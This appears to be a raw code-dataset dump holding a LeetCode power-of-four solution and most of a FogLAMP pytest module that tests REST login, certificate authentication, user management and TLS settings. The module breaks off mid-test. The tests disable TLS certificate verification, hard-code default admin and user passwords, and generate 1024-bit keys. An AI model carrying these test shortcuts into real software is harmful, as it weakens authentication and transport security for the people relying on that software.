| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b60ace879965a7fa78496316b617b576f083f211
| 1,317
|
py
|
Python
|
342.py
|
YukiMuraRindon/LeetcodePractice
|
3c9f84b677e4bc7be1d6b54009768d25536c4c12
|
[
"MIT"
] | null | null | null |
342.py
|
YukiMuraRindon/LeetcodePractice
|
3c9f84b677e4bc7be1d6b54009768d25536c4c12
|
[
"MIT"
] | null | null | null |
342.py
|
YukiMuraRindon/LeetcodePractice
|
3c9f84b677e4bc7be1d6b54009768d25536c4c12
|
[
"MIT"
] | null | null | null |
'''
Created: 2019-09-23 12:13:59
Author : YukiMuraRindon
Email : rinndonn@outlook.com
-----
Description: 给定一个整数 (32 位有符号整数),请编写一个函数来判断它是否是 4 的幂次方。
'''
class Solution:
    # Powers of four 4**0 .. 4**54, computed instead of hard-coded.  Kept as a
    # class attribute for backward compatibility with the original
    # lookup-table implementation (reproduces the original list exactly).
    table = [4 ** p for p in range(55)]

    def isPowerOfFour(self, num: int) -> bool:
        """Return True if num is a power of 4.

        Fixes the original table lookup, which was O(len(table)) per call and
        silently returned False for powers of four above 4**54.  A power of 4
        is a positive number with exactly one set bit (``num & (num - 1) == 0``)
        whose bit sits at an even position, which is equivalent to
        ``(num - 1) % 3 == 0``.
        """
        return num > 0 and num & (num - 1) == 0 and (num - 1) % 3 == 0
'''
md这个思路是真的有毒。。。'''
| 87.8
| 1,046
| 0.843584
| 90
| 1,317
| 12.344444
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.777044
| 0.080486
| 1,317
| 15
| 1,047
| 87.8
| 0.14038
| 0.107821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
377bcf9c47a7b0e5efafef52881ec3331a2f1b95
| 109,880
|
py
|
Python
|
tests/system/python/packages/test_authentication.py
|
foglamp/FogLAMP
|
918dff88b440e6ad580efdaa5f0fbdf4143a73d4
|
[
"Apache-2.0"
] | 65
|
2017-05-15T21:55:04.000Z
|
2022-01-19T01:30:42.000Z
|
tests/system/python/packages/test_authentication.py
|
foglamp/FogLAMP
|
918dff88b440e6ad580efdaa5f0fbdf4143a73d4
|
[
"Apache-2.0"
] | 576
|
2017-05-22T05:41:07.000Z
|
2020-02-13T07:48:58.000Z
|
tests/system/python/packages/test_authentication.py
|
foglamp/FogLAMP
|
918dff88b440e6ad580efdaa5f0fbdf4143a73d4
|
[
"Apache-2.0"
] | 52
|
2017-05-09T22:45:47.000Z
|
2022-03-10T18:49:02.000Z
|
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
""" Test authentication REST API """
import os
import subprocess
import http.client
import json
import time
import pytest
from pathlib import Path
import ssl
__author__ = "Yash Tatkondawar"
__copyright__ = "Copyright (c) 2019 Dianomic Systems"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
TEMPLATE_NAME = "template.json"
SENSOR_VALUE = 12.25
# TODO : pass package_build_version to setup script from conftest.py
package_build_version = "nightly"
HTTP_SOUTH_SVC_NAME = "SOUTH_HTTP"
HTTP_SOUTH_SVC_NAME_1 = "SOUTH_HTTP_1"
ASSET_NAME = "auth"
PASSWORD_TOKEN = None
CERT_TOKEN = None
# This gives the path of directory where FogLAMP is cloned. test_file < packages < python < system < tests < ROOT
PROJECT_ROOT = Path(__file__).parent.parent.parent.parent.parent
SCRIPTS_DIR_ROOT = "{}/tests/system/python/packages/data/".format(PROJECT_ROOT)
context = ssl._create_unverified_context()
def send_data_using_fogbench(wait_time):
    """Push 10 readings through fogbench's http plugin, then wait for ingestion."""
    command = 'cd {}/extras/python ;python3 -m fogbench -t $FOGLAMP_ROOT/data/tests/{} ' \
              '-p http -O 10'.format(PROJECT_ROOT, TEMPLATE_NAME)
    status = os.system(command)
    assert 0 == status
    # Give FogLAMP time to ingest the readings before the caller queries them.
    time.sleep(wait_time)
def add_south_http(foglamp_url, name, token, wait_time, tls_enabled):
    """Create an enabled http_south service via POST /foglamp/service.

    When tls_enabled, connects over HTTPS to localhost:1995 with certificate
    verification disabled; otherwise plain HTTP to foglamp_url.  Returns the
    decoded JSON response body.
    """
    post_url = "/foglamp/service"
    payload = {"name": name, "type": "south", "plugin": "http_south", "enabled": True}
    if tls_enabled:
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
    else:
        conn = http.client.HTTPConnection(foglamp_url)

    conn.request("POST", post_url, json.dumps(payload), headers={"authorization": token})
    res = conn.getresponse()
    assert 200 == res.status, "ERROR! POST {} request failed".format(post_url)
    jdoc = json.loads(res.read().decode())

    # Wait for the service to get added.
    time.sleep(wait_time * 2)
    return jdoc
def generate_json_for_fogbench(asset_name):
    """Write a one-sensor fogbench template for asset_name under $FOGLAMP_ROOT/data/tests."""
    subprocess.run(["cd $FOGLAMP_ROOT/data && mkdir -p tests"], shell=True, check=True)
    template_path = os.path.join(
        os.path.expandvars('${FOGLAMP_ROOT}'), 'data/tests/{}'.format(TEMPLATE_NAME))
    # min == max == SENSOR_VALUE pins every generated reading to SENSOR_VALUE.
    template = (
        '[{"name": "%s", "sensor_values": '
        '[{"name": "sensor", "type": "number", "min": %f, "max": %f, "precision": 2}]}]' % (
            asset_name, SENSOR_VALUE, SENSOR_VALUE))
    with open(template_path, "w") as f:
        f.write(template)
@pytest.fixture
def change_to_auth_mandatory_any(foglamp_url, wait_time):
    """Switch the REST API to mandatory authentication with authMethod "any"
    (password or certificate), then restart FogLAMP to apply it."""
    conn = http.client.HTTPConnection(foglamp_url)
    cfg = {"authentication": "mandatory", "authMethod": "any"}
    conn.request("PUT", '/foglamp/category/rest_api', json.dumps(cfg))
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['authentication']['value'] == "mandatory"
    # The auth mode only takes effect after a restart.
    conn.request("PUT", '/foglamp/restart', json.dumps({}))
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['message'] == "FogLAMP restart has been scheduled."
    # Wait for foglamp server to start
    time.sleep(wait_time * 2)
@pytest.fixture
def change_to_auth_mandatory_password(foglamp_url, wait_time):
    """Switch the REST API to mandatory authentication with authMethod
    "password", then restart FogLAMP to apply it."""
    conn = http.client.HTTPConnection(foglamp_url)
    cfg = {"authentication": "mandatory", "authMethod": "password"}
    conn.request("PUT", '/foglamp/category/rest_api', json.dumps(cfg))
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['authentication']['value'] == "mandatory"
    # The auth mode only takes effect after a restart.
    conn.request("PUT", '/foglamp/restart', json.dumps({}))
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['message'] == "FogLAMP restart has been scheduled."
    # Wait for foglamp server to start
    time.sleep(wait_time * 2)
@pytest.fixture
def change_to_auth_mandatory_certificate(foglamp_url, wait_time):
    """Switch the REST API to mandatory authentication with authMethod
    "certificate", then restart FogLAMP to apply it."""
    conn = http.client.HTTPConnection(foglamp_url)
    cfg = {"authentication": "mandatory", "authMethod": "certificate"}
    conn.request("PUT", '/foglamp/category/rest_api', json.dumps(cfg))
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['authentication']['value'] == "mandatory"
    # The auth mode only takes effect after a restart.
    conn.request("PUT", '/foglamp/restart', json.dumps({}))
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['message'] == "FogLAMP restart has been scheduled."
    # Wait for foglamp server to start
    time.sleep(wait_time * 2)
@pytest.fixture
def reset_foglamp(wait_time):
    """Kill any running FogLAMP instance and reset the installed package to a
    clean state, then wait for the server to come back up."""
    # TODO: Remove kill after resolution of FOGL-1499
    steps = (
        ("$FOGLAMP_ROOT/bin/foglamp kill", "kill command failed!"),
        ("cd {}/tests/system/python/scripts/package && ./reset".format(PROJECT_ROOT),
         "reset package script failed!"),
    )
    for cmd, failure_msg in steps:
        try:
            subprocess.run([cmd], shell=True, check=True)
        except subprocess.CalledProcessError:
            assert False, failure_msg
    # Wait for foglamp server to start
    time.sleep(wait_time)
@pytest.fixture
def remove_and_add_foglamp_pkgs():
    """Purge the installed FogLAMP packages, reinstall the requested build, and
    add the http-south plugin package these tests depend on."""
    steps = (
        ("cd {}/tests/system/python/scripts/package && ./remove".format(PROJECT_ROOT),
         "remove package script failed!"),
        ("cd {}/tests/system/python/scripts/package/ && ./setup {}".format(
            PROJECT_ROOT, package_build_version),
         "setup package script failed"),
        ("sudo apt install -y foglamp-south-http-south",
         "installation of http-south package failed"),
    )
    for cmd, failure_msg in steps:
        try:
            subprocess.run([cmd], shell=True, check=True)
        except subprocess.CalledProcessError:
            assert False, failure_msg
@pytest.fixture
def enable_tls():
    """Return a helper that disables plain HTTP on the REST API and restarts
    FogLAMP, after which the API is reachable over HTTPS only.

    The helper authenticates with the cached PASSWORD_TOKEN or CERT_TOKEN when
    *auth* is 'password' or 'certificate'; any other value sends no token.
    """
    def _enable_tls(foglamp_url, wait_time, auth):
        if auth == 'password':
            hdrs = {"authorization": PASSWORD_TOKEN}
        elif auth == 'certificate':
            hdrs = {"authorization": CERT_TOKEN}
        else:
            hdrs = None
        conn = http.client.HTTPConnection(foglamp_url)
        body = json.dumps({"enableHttp": "false"})
        if hdrs is None:
            conn.request("PUT", '/foglamp/category/rest_api', body)
        else:
            conn.request("PUT", '/foglamp/category/rest_api', body, headers=hdrs)
        assert conn.getresponse().status == 200
        # FIXME: Remove this wait time
        time.sleep(wait_time)
        conn = http.client.HTTPConnection(foglamp_url)
        if hdrs is None:
            conn.request("PUT", '/foglamp/restart', json.dumps({}))
        else:
            conn.request("PUT", '/foglamp/restart', json.dumps({}), headers=hdrs)
        assert conn.getresponse().status == 200
        # Wait for foglamp server to start
        time.sleep(wait_time * 2)
    return _enable_tls
@pytest.fixture
def generate_password_based_auth_token(asset_name, foglamp_url):
    """Log in as the non-admin 'user' account and cache its token in the
    module-level PASSWORD_TOKEN for use by later tests."""
    global PASSWORD_TOKEN
    conn = http.client.HTTPConnection(foglamp_url)
    creds = json.dumps({"username": "user", "password": "foglamp"})
    conn.request("POST", "/foglamp/login", creds)
    resp = conn.getresponse()
    assert resp.status == 200
    jdoc = json.loads(resp.read().decode())
    assert jdoc['message'] == "Logged in successfully"
    assert not jdoc['admin']
    PASSWORD_TOKEN = jdoc["token"]
@pytest.fixture
def generate_certificate_based_auth_token(asset_name, foglamp_url):
    """Log in with the admin certificate and cache the resulting token in the
    module-level CERT_TOKEN for use by later tests."""
    global CERT_TOKEN
    conn = http.client.HTTPConnection(foglamp_url)
    cert_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
    # The certificate file object itself is streamed as the request body.
    with open(cert_path, 'r') as cert:
        conn.request("POST", "/foglamp/login", body=cert)
        resp = conn.getresponse()
        assert resp.status == 200
        jdoc = json.loads(resp.read().decode())
        assert jdoc['message'] == "Logged in successfully"
        assert "token" in jdoc
        assert jdoc['admin']
        CERT_TOKEN = jdoc["token"]
class TestTLSDisabled:
    """Sanity checks of the REST API over plain HTTP (TLS disabled)."""

    def test_on_default_port(self, remove_and_add_foglamp_pkgs, reset_foglamp, foglamp_url):
        """A freshly installed and reset FogLAMP answers /foglamp/ping on the default port."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "uptime" in jdoc
        assert 0 < jdoc['uptime'], "FogLAMP not up."

    def test_on_custom_port(self, foglamp_url, wait_time):
        """Changing httpPort to 8005 and restarting moves the API to the new port."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"httpPort": "8005"}))
        r = conn.getresponse()
        assert 200 == r.status
        jdoc = json.loads(r.read().decode())
        assert "httpPort" in jdoc
        assert '8005' == jdoc['httpPort']['value']
        # FIXME: Remove this wait time
        time.sleep(wait_time)
        # Fix: send an empty JSON body with the restart request, matching every
        # other /foglamp/restart call in this module (the original sent none).
        conn.request("PUT", '/foglamp/restart', json.dumps({}))
        r = conn.getresponse()
        assert 200 == r.status
        jdoc = json.loads(r.read().decode())
        assert "FogLAMP restart has been scheduled." == jdoc['message']
        # Wait for foglamp server to start
        time.sleep(wait_time * 2)
        conn = http.client.HTTPConnection("localhost", 8005)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert "uptime" in jdoc
        assert 0 < jdoc['uptime'], "FogLAMP not up."

    def test_reset_to_default_port(self, foglamp_url, wait_time):
        """Restoring httpPort to 8081 and restarting brings the API back to the default port."""
        conn = http.client.HTTPConnection("localhost", 8005)
        conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"httpPort": "8081"}))
        r = conn.getresponse()
        assert 200 == r.status
        jdoc = json.loads(r.read().decode())
        assert "httpPort" in jdoc
        assert '8081' == jdoc['httpPort']['value']
        # FIXME: Remove this wait time
        time.sleep(wait_time)
        conn.request("PUT", '/foglamp/restart', json.dumps({}))
        r = conn.getresponse()
        assert 200 == r.status
        jdoc = json.loads(r.read().decode())
        assert "FogLAMP restart has been scheduled." == jdoc['message']
        # Wait for foglamp server to start
        time.sleep(wait_time * 2)
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert "uptime" in jdoc
        assert 0 < jdoc['uptime'], "FogLAMP not up."
class TestAuthAnyWithoutTLS:
    """Authentication tests with authMethod "any" (password OR certificate)
    over plain HTTP.

    NOTE(review): these tests are strictly order-dependent. Login tests cache
    tokens in the module-level PASSWORD_TOKEN / CERT_TOKEN globals, user tests
    assume sequential user IDs (3..6) from the creation order, and the ingest
    tests assume cumulative dataRead counts (10, then 20). Do not reorder or
    run methods in isolation.
    """

    def test_login_regular_user_using_password(self, reset_foglamp, change_to_auth_mandatory_any,
                                               foglamp_url):
        # Password login as the default non-admin 'user' account.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert not jdoc['admin']
        # Cache the token for the tests that follow.
        global PASSWORD_TOKEN
        PASSWORD_TOKEN = jdoc["token"]

    def test_logout_me_password_token(self, foglamp_url):
        # Logging out invalidates the cached regular-user token.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert jdoc['logout']

    def test_login_with_invalid_credentials_regular_user_using_password(self, foglamp_url):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
        r = conn.getresponse()
        assert 404 == r.status
        assert "Username or Password do not match" == r.reason

    def test_login_username_admin_using_password(self, foglamp_url):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert "token" in jdoc
        assert jdoc['admin']
        # From here on PASSWORD_TOKEN holds an *admin* token.
        global PASSWORD_TOKEN
        PASSWORD_TOKEN = jdoc["token"]

    def test_login_with_invalid_credentials_admin_using_password(self, foglamp_url):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
        r = conn.getresponse()
        assert 404 == r.status
        assert "Username or Password do not match" == r.reason

    def test_login_with_user_certificate(self, foglamp_url):
        # Certificate login: the cert file object is streamed as the POST body.
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            assert "token" in jdoc
            assert not jdoc['admin']

    def test_login_with_admin_certificate(self, foglamp_url):
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            assert "token" in jdoc
            assert jdoc['admin']
            # Cache the admin certificate token for later tests.
            global CERT_TOKEN
            CERT_TOKEN = jdoc["token"]

    def test_login_with_custom_certificate(self, foglamp_url, remove_data_file):
        # Create a custom certificate and sign
        try:
            subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
            subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
                           shell=True)
            subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
                            "-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
                            "-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
        except subprocess.CalledProcessError:
            assert False, " Certificate creation failed!"
        # Login with custom certificate
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = 'custom.cert'
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            assert "token" in jdoc
            assert not jdoc['admin']
        # Delete Certificates and keys created
        remove_data_file('custom.key')
        remove_data_file('custom.csr')
        remove_data_file('custom.cert')

    def test_ping_with_allow_ping_true(self, foglamp_url):
        # Ping is open (no token) while allowPing is true; no data ingested yet.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 0 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ingest_with_password_token(self, foglamp_url, wait_time):
        # First ingest batch: 10 readings via a service created with the password token.
        add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=False)
        generate_json_for_fogbench(ASSET_NAME)
        send_data_using_fogbench(wait_time)
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 10 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ingest_with_certificate_token(self, foglamp_url, wait_time):
        # Second ingest batch: dataRead is cumulative, so 10 + 10 = 20.
        add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME_1, CERT_TOKEN, wait_time, tls_enabled=False)
        generate_json_for_fogbench(ASSET_NAME)
        send_data_using_fogbench(wait_time)
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 20 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ping_with_allow_ping_false_with_password_token(self, foglamp_url):
        # With allowPing false, an unauthenticated ping must be rejected.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        _token = jdoc["token"]
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        assert 403 == r.status
        assert "Forbidden" == r.reason

    def test_ping_with_allow_ping_false_with_certificate_token(self, foglamp_url):
        # Same as above, but the config change is authorized via certificate login.
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            _token = jdoc["token"]
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        assert 403 == r.status
        assert "Forbidden" == r.reason

    @pytest.mark.parametrize(("query", "expected_values"), [
        ('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
                        {'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
        ('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
        ('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
        ('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
    ])
    def test_get_users_with_password_token(self, foglamp_url, query, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    @pytest.mark.parametrize(("query", "expected_values"), [
        ('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
                        {'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
        ('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
        ('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
        ('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
    ])
    def test_get_users_with_certificate_token(self, foglamp_url, query, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    def test_get_roles_with_password_token(self, foglamp_url):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
                          {'description': 'All CRUD operations and self profile management',
                           'id': 2, 'name': 'user'}]} == jdoc

    def test_get_roles_with_certificate_token(self, foglamp_url):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
                          {'description': 'All CRUD operations and self profile management',
                           'id': 2, 'name': 'user'}]} == jdoc

    # User creation below assumes a fresh install where the next user IDs are
    # 3 and 4 (password token) then 5 and 6 (certificate token).
    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
                                                        'message': 'User has been created successfully'}),
        ({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
         {'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
          'message': 'User has been created successfully'}),
    ])
    def test_create_user_with_password_token(self, foglamp_url, form_data, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
                     headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any2", "password": "User@123"}, {'user': {'userName': 'any2', 'userId': 5, 'roleId': 2},
                                                        'message': 'User has been created successfully'}),
        ({"username": "admin2", "password": "F0gl@mp!", "role_id": 1},
         {'user': {'userName': 'admin2', 'userId': 6, 'roleId': 1},
          'message': 'User has been created successfully'}),
    ])
    def test_create_user_with_certificate_token(self, foglamp_url, form_data, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
        ({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully'),
        ({"username": "any2", "password": "User@123"}, 'Logged in successfully'),
        ({"username": "admin2", "password": "F0gl@mp!"}, 'Logged in successfully')
    ])
    def test_login_of_newly_created_user(self, foglamp_url, form_data, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc['message']

    def test_update_password_with_password_token(self, foglamp_url):
        # 'any1' is user id 3, created above with password User@123.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
                                                                            "new_password": "F0gl@mp1"}),
                     headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc

    def test_update_password_with_certificate_token(self, foglamp_url):
        # 'any2' is user id 5, created above with password User@123.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", "/foglamp/user/any2/password", body=json.dumps({"current_password": "User@123",
                                                                            "new_password": "F0gl@mp2"}),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'Password has been updated successfully for user id:<5>'} == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "F0gl@mp1"}, 'Logged in successfully'),
        ({"username": "any2", "password": "F0gl@mp2"}, 'Logged in successfully')
    ])
    def test_login_with_updated_password(self, foglamp_url, form_data, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc['message']

    def test_reset_user_with_password_token(self, foglamp_url):
        # Admin reset of user id 3: changes both role and password.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#1"}),
                     headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'User with id:<3> has been updated successfully'} == jdoc

    def test_reset_user_with_certificate_token(self, foglamp_url):
        # Admin reset of user id 5: changes both role and password.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", "/foglamp/admin/5/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#2"}),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'User with id:<5> has been updated successfully'} == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "F0gl@mp!#1"}, 'Logged in successfully'),
        ({"username": "any2", "password": "F0gl@mp!#2"}, 'Logged in successfully')
    ])
    def test_login_with_resetted_password(self, foglamp_url, form_data, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc['message']

    def test_delete_user_with_password_token(self, foglamp_url):
        # Deletes 'admin1' (user id 4).
